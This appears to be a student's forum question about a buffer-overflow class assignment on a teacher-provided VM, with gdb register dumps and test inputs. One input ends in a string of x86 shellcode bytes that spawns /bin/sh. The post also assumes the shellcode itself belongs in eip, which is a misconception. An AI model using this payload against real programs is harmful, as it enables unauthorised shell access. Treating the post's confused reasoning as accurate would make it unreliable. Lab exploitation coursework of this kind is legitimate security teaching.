So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which if we are able to get shellcode into the return address of the stack, it will execute there on the stack. I do not need to do a loop back into my buffer or any of that. I am of the understanding that the register I am wanting to overwrite and put my shellcode in is eip. I got that from info from here https://greyhat.gatech.edu/wiki/index.php?title=Stack_Buffer_Overflow
I have figured out that if I fill my buffer, s1[64] with 72 characters, I can get a seg fault: Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? () And when I have gdb print out the value of the registers I get:
ebx 0xb7fc8000 -1208188928
esp 0xbffff600 0xbffff600
ebp 0x0 0x0
esi 0x0 0
edi 0x80484c0 134513856
eip 0x0 0x0 <------ Clearly i've messed up eip
If I fill my buffer with one less character,aka 71, the program executes sucessfuly, so I feel like 72 has to be a magic number somehow. So I have then tried to fill s1 with 72 filler characters followed by my shellcode. I get a different segfault this time:
Program received signal SIGSEGV, Segmentation fault.
0x080486f5 in main () at badcopyTester2.c:61 and gdb reveals that eip is filled with 0x080486f5 Why/How did eip get this value over it? Shouldn't it my shellcode in there? Also, no matter what I put at the end of my 72 filler characters, eip is always filled with that same 0x080486f5. Both the input of
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA and
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68 give that exact same segment fault.
Again, I feel like I'm very close as I found how to get eip cleared but am stuck past that. Thanks for your help!
